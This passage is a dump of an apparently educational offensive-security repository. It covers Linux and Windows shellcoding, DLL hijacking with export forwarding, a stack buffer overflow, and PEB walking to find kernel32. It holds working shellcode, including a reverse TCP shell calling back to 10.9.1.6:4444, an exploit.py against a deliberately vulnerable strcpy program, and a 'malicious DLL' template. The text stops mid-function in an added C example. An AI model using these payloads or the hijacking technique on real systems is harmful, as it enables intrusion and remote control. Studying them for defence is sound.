https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3.exe
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello3.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello3.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello64
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello64.asm:
--------------------------------------------------------------------------------
; hello64.asm: writes "hello world" to the console using only system calls.
; author: @cocomelonc
; run:
; nasm -f elf64 -o hello64.o hello64.asm
; ld -o hello64 hello64.o && ./hello64
; 64-bit linux

section .text
global _start

_start:
  mov rax, 1          ; system call for write
  mov rdi, 1          ; file handle 1 is stdout
  mov rsi, msg        ; address of string to output
  mov rdx, 12         ; number of bytes ("hello world" plus the newline)
  syscall

_exit:
  mov rax, 60         ; sys_exit system call
  mov rdi, 219        ; exit status 219 (check with echo $?); 0 would signal success
  syscall

section .data
msg: db "hello world", 10   ; note the newline at the end
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/hello64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-08-malware-analysis-2/hello64.o
--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-example1.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-example2.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-example3.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-hello.txt:
--------------------------------------------------------------------------------
break _start

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-hello2.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-hello3.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-08-malware-analysis-2/peda-session-hello64.txt:
--------------------------------------------------------------------------------
break _start

--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/README.md:
--------------------------------------------------------------------------------
# Linux shellcoding. Examples

Linux shellcoding. Examples:
* normal exit
* spawn linux shell

[https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html](https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html)
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example1
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example1.asm:
--------------------------------------------------------------------------------
; just normal exit
; author @cocomelonc
; nasm -f elf32 -o example1.o example1.asm
; ld -m elf_i386 -o example1 example1.o && ./example1
; 32-bit linux

section .data

section .bss

section .text
global _start          ; must be declared for linker

; normal exit
_start:                ; linker entry point
  xor eax, eax         ; zero out eax
  mov al, 1            ; sys_exit system call (mov eax, 1) without null bytes
  int 0x80             ; call sys_exit
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example1.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example1.o
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example2
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example2.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example2.o
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example3
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/example3.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/example3.o
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit0
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit0.c:
--------------------------------------------------------------------------------
/*
  exit0.c - for demonstrating
  how libc wraps syscalls
*/
#include <stdlib.h>

int main(void) {
  exit(0);
}
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit1
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit1.asm:
--------------------------------------------------------------------------------
; just normal exit
; author @cocomelonc
; nasm -f elf32 -o exit1.o exit1.asm
; ld -m elf_i386 -o exit1 exit1.o && ./exit1
; 32-bit linux

section .data

section .bss

section .text
global _start          ; must be declared for linker

; normal exit
_start:                ; linker entry point
  mov eax, 0           ; zero out eax (encodes as b8 00 00 00 00: four null bytes)
  mov eax, 1           ; sys_exit system call (b8 01 00 00 00: three more null bytes)
  int 0x80             ; call sys_exit
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit1.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit1.o
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit2
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit2.asm:
--------------------------------------------------------------------------------
; just normal exit
; author @cocomelonc
; nasm -f elf32 -o exit2.o exit2.asm
; ld -m elf_i386 -o exit2 exit2.o && ./exit2
; 32-bit linux

section .data

section .bss

section .text
global _start          ; must be declared for linker

; normal exit
_start:                ; linker entry point
  xor eax, eax         ; zero out eax (31 c0: no null bytes)
  mov al, 1            ; sys_exit system call (mov eax, 1) without null bytes (b0 01)
  int 0x80             ; call sys_exit
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/exit2.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/exit2.o
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/meow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/meow
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/meow.c:
--------------------------------------------------------------------------------
/*
  meow.c - demonstrate nullbytes
*/
#include <stdio.h>
int main(void) {
  // C string functions treat \x00 as the terminator: only "=^..^= meow " is printed
  printf ("=^..^= meow \x00 meow");
  return 0;
}
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/peda-session-dash.txt:
--------------------------------------------------------------------------------
break _start
disable $bpnum

--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/peda-session-example1.txt:
--------------------------------------------------------------------------------
break _start

--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/peda-session-example2.txt:
--------------------------------------------------------------------------------
break _start

--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/peda-session-run.txt:
--------------------------------------------------------------------------------
break main

--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/run:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/run
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/run.c:
--------------------------------------------------------------------------------
/*
  run.c - a small skeleton program to run shellcode
  note: code[] lives in a writable data section; on an NX-enabled system this
  only executes if the binary is built with an executable data segment
  (-z execstack), and the int 0x80 shellcode below needs a 32-bit build (-m32)
*/
// bytecode here: execve("/bin//sh", ...)
char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv) {
  int (*func)();             // function pointer
  func = (int (*)()) code;   // func points to our shellcode
  (int)(*func)();            // execute a function code[]
  // execve() replaces the process on success, so main never returns 1;
  // if the program does return 1 the shellcode did not work
  return 1;
}
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/shell2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-09-linux-shellcoding-1/shell2
--------------------------------------------------------------------------------
/2021-10-09-linux-shellcoding-1/shell2.c:
--------------------------------------------------------------------------------
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>

char *shell[2];
int main(void) {
  shell[0] = "/bin/sh";
  shell[1] = NULL;
  execve(shell[0], shell, NULL);   // argv = {"/bin/sh", NULL}, envp = NULL
  exit(0);
}

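The files in this directory turn on two properties of shellcode: it must contain no null bytes when it is delivered through C string functions (exit1.asm against exit2.asm, and meow.c), and the memory it runs from must be executable (run.c executes a `char code[]` array that lives in writable data). The following C program is an added example, not code from the original repository. It counts null bytes in each encoding and maps the execve shellcode from run.c into a fresh page that is made executable only after the copy (RW, then RX; never writable and executable at once), which is what an NX system expects instead of `-z execstack`. The exit1/exit2 byte strings were assembled by hand from the two .asm files; the int 0x80 ABI is 32-bit, so build with `gcc -m32` if you want the final call to actually spawn a shell.

```c
/*
 * sc_check.c - audit shellcode for null bytes and run it from W^X memory.
 * Added example, not part of the cocomelonc/meow repository.
 * build: gcc -m32 -o sc_check sc_check.c
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>

/* exit1.asm: mov eax,0 ; mov eax,1 ; int 0x80  (hand-assembled, full of nulls) */
const uint8_t exit1_sc[] = "\xb8\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80";
/* exit2.asm: xor eax,eax ; mov al,1 ; int 0x80   (hand-assembled, null-free) */
const uint8_t exit2_sc[] = "\x31\xc0\xb0\x01\xcd\x80";
/* run.c: execve("/bin//sh") */
const uint8_t sh_sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68"
                        "\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80";

/* Number of 0x00 bytes in the first n bytes. strcpy()/printf() delivery stops at the first one. */
size_t count_nul_bytes(const uint8_t *sc, size_t n) {
    size_t c = 0;
    for (size_t i = 0; i < n; i++)
        if (sc[i] == 0) c++;
    return c;
}

/* Copy the shellcode into an anonymous page and flip it RW -> RX.
   Returns NULL if mmap/mprotect is refused (e.g. a hardened execmem policy). */
void *map_shellcode(const uint8_t *sc, size_t n) {
    size_t len = (n + 4095) & ~(size_t)4095;
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
    memcpy(p, sc, n);
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(p, len);
        return NULL;
    }
    return p;
}

int main(void) {
    /* sizeof - 1 drops the string literal's own terminating null */
    printf("exit1: %zu null bytes\n", count_nul_bytes(exit1_sc, sizeof exit1_sc - 1));
    printf("exit2: %zu null bytes\n", count_nul_bytes(exit2_sc, sizeof exit2_sc - 1));
    if (count_nul_bytes(sh_sc, sizeof sh_sc - 1) != 0) {
        puts("refusing to run: shellcode contains a null byte");
        return 1;
    }
    void (*fn)(void) = (void (*)(void))map_shellcode(sh_sc, sizeof sh_sc - 1);
    if (!fn) { perror("map_shellcode"); return 1; }
    fn();        /* int 0x80 with 32-bit pointers: only meaningful in a -m32 process */
    return 1;    /* not reached when execve succeeded */
}
```

exit1 reports 7 null bytes (four from `mov eax, 0` and three from `mov eax, 1`), exit2 and the execve payload report none; the RW-then-RX mapping is the part to keep when a runner has to work on a system where `.data` is never executable.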
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/README.md:
--------------------------------------------------------------------------------
# DLL hijacking with exported functions

Classic DLL hijacking in windows with exported functions. Real world example: Microsoft Teams v.1.3.00.24758.

[https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html](https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html)
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/cartoon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/cartoon.exe
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/cscapi.def:
--------------------------------------------------------------------------------
EXPORTS
CscNetApiGetInterface=cscapi.CscNetApiGetInterface @1
CscSearchApiGetInterface=cscapi.CscSearchApiGetInterface @2
OfflineFilesEnable=cscapi.OfflineFilesEnable @3
OfflineFilesGetShareCachingMode=cscapi.OfflineFilesGetShareCachingMode @4
OfflineFilesQueryStatus=cscapi.OfflineFilesQueryStatus @5
OfflineFilesQueryStatusEx=cscapi.OfflineFilesQueryStatusEx @6
OfflineFilesStart=cscapi.OfflineFilesStart @7
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/cscapi.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/cscapi.dll
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/dll-def.py:
--------------------------------------------------------------------------------
import pefile
import sys
import os.path

# usage: python3 dll-def.py <path to the original dll>
# writes <name>.def with one forwarder line per named export, e.g.
#   OfflineFilesStart=cscapi.OfflineFilesStart @7
dll = pefile.PE(sys.argv[1])
# module name only, without directory: a forwarder refers to the DLL by name
dll_basename = os.path.splitext(os.path.basename(sys.argv[1]))[0]

try:
    with open(dll_basename + ".def", "w") as f:
        f.write("EXPORTS\n")
        for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
            if export.name:
                f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
except Exception as e:
    print("failed to create .def file :( {}".format(e))
else:
    print("successfully created .def file :)")
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/evil.c:
--------------------------------------------------------------------------------
/*
evil.c - malicious DLL
DLL hijacking with exported functions example
author: @cocomelonc
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      // runs under the loader lock; a MessageBox here is fine for a demo,
      // but real payloads should defer work to a new thread
      MessageBox(
        NULL,
        "Meow-woof!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/evil.dll
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/evil2.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/evil2.dll
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/pet.def:
--------------------------------------------------------------------------------
EXPORTS
Bird=pet.Bird @1
Cat=pet.Cat @2
Mouse=pet.Mouse @3
--------------------------------------------------------------------------------
/2021-10-12-dll-hijacking-2/pet.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-12-dll-hijacking-2/pet.dll
--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/.gdb_history:
--------------------------------------------------------------------------------
b _start
r
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
q
b _start
r
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
si
q
--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/README.md:
--------------------------------------------------------------------------------
# Linux shellcoding - 2. Reverse TCP shell

Linux shellcoding. Reverse TCP shell.

--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/peda-session-rev.txt:
--------------------------------------------------------------------------------
break _start

--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/rev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/rev
--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/rev.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/rev.o
--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/run:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-17-linux-shellcoding-2/run
--------------------------------------------------------------------------------
/2021-10-17-linux-shellcoding-2/run.c:
--------------------------------------------------------------------------------
/*
  run.c - a small skeleton program to run shellcode
  (32-bit int 0x80 shellcode: build with -m32 and an executable data segment)
*/
// bytecode here: socket / connect / dup2 x3 / execve("/bin//sh")
// the callback target is baked in as immediates: push 0x0601090a = 10.9.1.6, push word 0x5c11 = port 4444
char code[] = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x0a\x09\x01\x06\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(int argc, char **argv) {
  int (*func)();             // function pointer
  func = (int (*)()) code;   // func points to our shellcode
  (int)(*func)();            // execute a function code[]
  // execve() replaces the process on success, so main never returns 1;
  // if the program does return 1 the shellcode did not work
  return 1;
}
--------------------------------------------------------------------------------
/2021-10-20-buffer-overflow-1/.gitignore:
--------------------------------------------------------------------------------
/peda*
--------------------------------------------------------------------------------
/2021-10-20-buffer-overflow-1/README.md:
--------------------------------------------------------------------------------
# Buffer overflow - part 1. Linux stack smashing.

Classic buffer overflow exploitation in linux.

[https://cocomelonc.github.io/pwn/2021/10/19/buffer-overflow-1.html](https://cocomelonc.github.io/pwn/2021/10/19/buffer-overflow-1.html)
--------------------------------------------------------------------------------
/2021-10-20-buffer-overflow-1/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
# exploit.py - final payload with spawn /bin/sh shellcode
# layout: [padding][64-byte NOP sled][shellcode][saved EIP] = 272 bytes
import sys

shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
padding = b"\x41" * (272 - 64 - len(shellcode) - 4)
nop = b"\x90" * 64
# little-endian 0xffffd3f4: an address inside the NOP sled, found in gdb; it is specific to that session
eip = b"\xf4\xd3\xff\xff"
sys.stdout.buffer.write(padding + nop + shellcode + eip)
--------------------------------------------------------------------------------
/2021-10-20-buffer-overflow-1/vuln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-20-buffer-overflow-1/vuln
--------------------------------------------------------------------------------
/2021-10-20-buffer-overflow-1/vuln.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int overflow(char *input) {
  char buf[256];
  strcpy(buf, input);   // no bounds check: a longer argv[1] overwrites the saved ebp and return address
  return 1;
}

int main(int argc, char *argv[]) {
  overflow(argv[1]);
  printf("meow =^..^=\n");
  return 1;
}
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/README.md:
--------------------------------------------------------------------------------
# Windows x86 shellcoding part 1.

Simplest C/C++ example. Run calc.exe and exit.

[https://cocomelonc.github.io/tutorial/2021/10/27/windows-shellcoding-1.html](https://cocomelonc.github.io/tutorial/2021/10/27/windows-shellcoding-1.html)
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/conv.py:
--------------------------------------------------------------------------------
# convert string to reversed hex
# usage: python3 conv.py calc.exe
# prints the 4-byte chunks, last chunk first and byte-reversed,
# ready to be pushed so the string ends up in memory in order
import sys

input = sys.argv[1]
chunks = [input[i:i+4] for i in range(0, len(input), 4)]
for chunk in chunks[::-1]:
    print ("0x" + chunk[::-1].encode("utf-8").hex())
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/example1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/example1
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/example1.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/example1.o
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/exit.c:
--------------------------------------------------------------------------------
/*
  exit.c - run calc.exe and exit
*/

#include <windows.h>

int main(void) {
  WinExec("calc.exe", 0);
  ExitProcess(0);
}
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/exit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/exit.exe
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/getaddr.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/getaddr.exe
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/run.c:
--------------------------------------------------------------------------------
/*
  run.c - a small skeleton program to run shellcode
*/
// bytecode here: push "calc.exe", call WinExec, then jmp ExitProcess
// WinExec (0x76f0e5fd) and ExitProcess (0x76ed214f) are hard-coded for the machine
// the addresses were taken from; ASLR changes them per boot, so the shellcode
// only works there (part 2 resolves kernel32 dynamically instead)
char code[] = "\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\xfd\xe5\xf0\x76\xff\xd3\x31\xc0\x50\xb8\x4f\x21\xed\x76\xff\xe0";

int main(int argc, char **argv) {
  int (*func)();             // function pointer
  func = (int (*)()) code;   // func points to our shellcode
  (int)(*func)();            // execute a function code[]
  // ExitProcess(0) ends the process inside the shellcode, so main never returns 1;
  // if the program does return 1 the shellcode did not work
  return 1;
}
--------------------------------------------------------------------------------
/2021-10-26-windows-shellcoding-1/run.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-26-windows-shellcoding-1/run.exe
--------------------------------------------------------------------------------
/2021-10-30-windows-shellcoding-2/README.md:
--------------------------------------------------------------------------------
# Windows shellcoding - part 2

Find `kernel32` address via assembly. Source code of post:

[https://cocomelonc.github.io/tutorial/2021/10/30/windows-shellcoding-2.html](https://cocomelonc.github.io/tutorial/2021/10/30/windows-shellcoding-2.html)
--------------------------------------------------------------------------------
/2021-10-30-windows-shellcoding-2/kernel.asm:
--------------------------------------------------------------------------------
; find kernel32
; author @cocomelonc
; nasm -f win32 -o kernel.o kernel.asm
; ld -m i386pe -o kernel.exe kernel.o
; 32-bit windows

section .data

section .bss

section .text
global _start          ; must be declared for linker

_start:
  xor ecx, ecx
  mov eax, [fs:ecx + 0x30]   ; TEB+0x30 = pointer to the PEB struct (32-bit process)
  mov eax, [eax + 0xc]       ; PEB+0x0c = Ldr (PEB_LDR_DATA)
  mov eax, [eax + 0x14]      ; Ldr+0x14 = InMemoryOrderModuleList.Flink
  mov eax, [eax]             ; 1st entry is this exe (kernel.exe); follow Flink to the 2nd
  mov eax, [eax]             ; 2nd entry is ntdll.dll; follow Flink to the 3rd
  mov eax, [eax + 0x10]      ; 3rd entry is kernel32.dll: DllBase (entry+0x18) is 0x10 past the links (entry+0x08)
--------------------------------------------------------------------------------
/2021-10-30-windows-shellcoding-2/kernel.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-30-windows-shellcoding-2/kernel.exe
--------------------------------------------------------------------------------
/2021-10-30-windows-shellcoding-2/kernel.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-10-30-windows-shellcoding-2/kernel.o
--------------------------------------------------------------------------------
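kernel.asm is a chain of fixed structure offsets, and getting one of them wrong produces a silent garbage pointer. The C program below is an added example, not code from the original repository: it performs the same pointer chase against a constructed 32-bit memory image (a byte array in which an "address" is just an offset), so every offset can be checked on any host without a Windows debugger. The module bases 0x00400000, 0x77000000 and 0x76f00000 are made-up values for the mock; on a real process they change every boot under ASLR, which is exactly why the hard-coded WinExec/ExitProcess addresses in windows-shellcoding-1/run.c stop working and this walk is needed. Two assumptions the mock makes explicit: the InMemoryOrder list starts exe, ntdll.dll, kernel32.dll (a more robust loader compares BaseDllName instead of counting), and fs:[0x30] is the 32-bit PEB pointer (a 64-bit process reads gs:[0x60] and uses different offsets).

```c
/*
 * peb_walk.c - the kernel.asm pointer chase in C, run against a mock 32-bit
 * PEB/LDR image so the offsets can be verified offline.
 * Added example, not part of the cocomelonc/meow repository.
 */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define MEM_SIZE 0x1000
static uint8_t mem[MEM_SIZE];          /* fake 32-bit address space: address == offset */

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

/* x86 (32-bit) structure offsets used by kernel.asm */
#define PEB_LDR              0x0c   /* PEB.Ldr */
#define LDR_INMEMORYORDER    0x14   /* PEB_LDR_DATA.InMemoryOrderModuleList.Flink */
#define ENTRY_INMEMORYORDER  0x08   /* LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks */
#define ENTRY_DLLBASE        0x18   /* LDR_DATA_TABLE_ENTRY.DllBase */
#define LINK_TO_DLLBASE (ENTRY_DLLBASE - ENTRY_INMEMORYORDER)   /* 0x10, the constant in kernel.asm */

/* Same chase as kernel.asm; the PEB address is passed in instead of read from fs:[0x30]. */
uint32_t find_kernel32(uint32_t peb) {
    uint32_t ldr   = rd32(peb + PEB_LDR);            /* mov eax, [eax + 0xc]  */
    uint32_t link1 = rd32(ldr + LDR_INMEMORYORDER);  /* mov eax, [eax + 0x14] : 1st entry, the exe */
    uint32_t link2 = rd32(link1);                    /* mov eax, [eax]        : 2nd entry, ntdll */
    uint32_t link3 = rd32(link2);                    /* mov eax, [eax]        : 3rd entry, kernel32 */
    return rd32(link3 + LINK_TO_DLLBASE);            /* mov eax, [eax + 0x10] : DllBase */
}

/* Build PEB -> Ldr -> exe -> ntdll -> kernel32 -> (back to the list head). Returns the PEB address. */
uint32_t build_mock_peb(void) {
    const uint32_t peb = 0x100, ldr = 0x200;
    const uint32_t entry[3] = { 0x300, 0x400, 0x500 };
    const uint32_t base[3]  = { 0x00400000u, 0x77000000u, 0x76f00000u };  /* exe, ntdll, kernel32: made up */
    memset(mem, 0, sizeof mem);
    wr32(peb + PEB_LDR, ldr);
    wr32(ldr + LDR_INMEMORYORDER, entry[0] + ENTRY_INMEMORYORDER);   /* head.Flink -> exe links */
    for (int i = 0; i < 3; i++) {
        uint32_t next = (i < 2) ? entry[i + 1] + ENTRY_INMEMORYORDER   /* Flink -> next entry's links */
                                : ldr + LDR_INMEMORYORDER;            /* last entry points back at the head */
        wr32(entry[i] + ENTRY_INMEMORYORDER, next);
        wr32(entry[i] + ENTRY_DLLBASE, base[i]);
    }
    return peb;
}

int main(void) {
    uint32_t peb = build_mock_peb();
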